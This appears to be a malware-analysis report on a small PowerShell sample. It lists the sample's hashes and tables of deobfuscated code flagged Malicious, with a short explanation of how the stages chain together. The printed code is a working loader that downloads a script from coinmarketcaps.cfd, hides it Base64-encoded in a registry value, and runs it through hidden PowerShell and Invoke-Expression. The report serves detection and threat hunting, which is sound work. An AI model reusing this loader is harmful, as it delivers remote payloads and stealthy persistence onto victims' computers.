7ec0bbdada8f71d6192e512d553b0bc4
PowerShell | MD5: 7ec0bbdada8f71d6192e512d553b0bc4 | Size: 930 B | application/x-powershell
| Hash | Hash Value |
|---|---|
| MD5 | 7ec0bbdada8f71d6192e512d553b0bc4 |
| Sha1 | a6e94554a61abe104d129118f2519226b8f745e4 |
| Sha256 | 8b0a9b414d895ced0a4bb3ba586b94463043a6ec5d884e5e0815a740ccf9ac96 |
| Sha384 | 62a73dbdf4aed370b6b88a0d70a381d6e54d72f6066f60ae4af9bb08f6a2c6ea59bdea9fdefcd26671c0e8c251b3d82a |
| Sha512 | e97cf7d93191b4b997fb24b251a21595033b93564893ae1ea50c29aac8eac432a31f96c95b34b23a9862daed271d7895512969ce5efc6e7f8a08041d7cc2c645 |
| SSDeep | 24:x0e9zTe8VbahAFVkGArxl2eQxUaqw6kgQoM95Y:Lli8la+Vk9xgekgwIQowq |
| TLSH | 6E11141DEF30F9C84B3C728890AA2E1B1154612997336DE4C5085CB11D297A6CF5A6C4 |

| Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $pd = [Convert]::"ToBase64String"([Encoding]::"UTF8"."GetBytes"(((New-Object "Net.WebClient")."DownloadString"("https://coinmarketcaps.cfd/static/shadow_cCvBpS.ps1")))) Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC\" -Name "#shadow_cCvBpS" -Value $pd Start-Process "powershell" -WindowStyle "Hidden" -ArgumentList "-ec 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" |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_cCvBpS") | Select-Object -ExpandProperty "#shadow_cCvBpS")))) |
| Deobfuscated PowerShell | $pd = [Convert]::"ToBase64String"([Encoding]::"UTF8"."GetBytes"(((New-Object "Net.WebClient")."DownloadString"("https://coinmarketcaps.cfd/static/shadow_cCvBpS.ps1")))) Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC\" -Name "#shadow_cCvBpS" -Value $pd Start-Process "powershell" -WindowStyle "Hidden" -ArgumentList "-ec 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" |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_cCvBpS") | Select-Object -ExpandProperty "#shadow_cCvBpS")))) |

Read together, the rows below show a staging chain: the top-level script stores the downloaded content Base64-encoded in the registry value `#shadow_cCvBpS`, and the row located at `[Base64-Block]` (apparently the decoded `-ec` argument) reads that value back and passes it to `Invoke-Expression`, so the registry value is an indicator to hunt for alongside the hashes above.

| Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $pd = [Convert]::"ToBase64String"([Encoding]::"UTF8"."GetBytes"(((New-Object "Net.WebClient")."DownloadString"("https://coinmarketcaps.cfd/static/shadow_cCvBpS.ps1")))) Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC\" -Name "#shadow_cCvBpS" -Value $pd Start-Process "powershell" -WindowStyle "Hidden" -ArgumentList "-ec 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" (verdict: Malicious) | 7ec0bbdada8f71d6192e512d553b0bc4 |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_cCvBpS") | Select-Object -ExpandProperty "#shadow_cCvBpS")))) (verdict: Malicious) | 7ec0bbdada8f71d6192e512d553b0bc4 > [Base64-Block] |
| Deobfuscated PowerShell | $pd = [Convert]::"ToBase64String"([Encoding]::"UTF8"."GetBytes"(((New-Object "Net.WebClient")."DownloadString"("https://coinmarketcaps.cfd/static/shadow_cCvBpS.ps1")))) Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC\" -Name "#shadow_cCvBpS" -Value $pd Start-Process "powershell" -WindowStyle "Hidden" -ArgumentList "-ec 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" (verdict: Malicious) | 7ec0bbdada8f71d6192e512d553b0bc4 > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"(((Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\TabletPC" -Name "#shadow_cCvBpS") | Select-Object -ExpandProperty "#shadow_cCvBpS")))) (verdict: Malicious) | 7ec0bbdada8f71d6192e512d553b0bc4 > [Base64-Block] > [Deobfuscated PS] |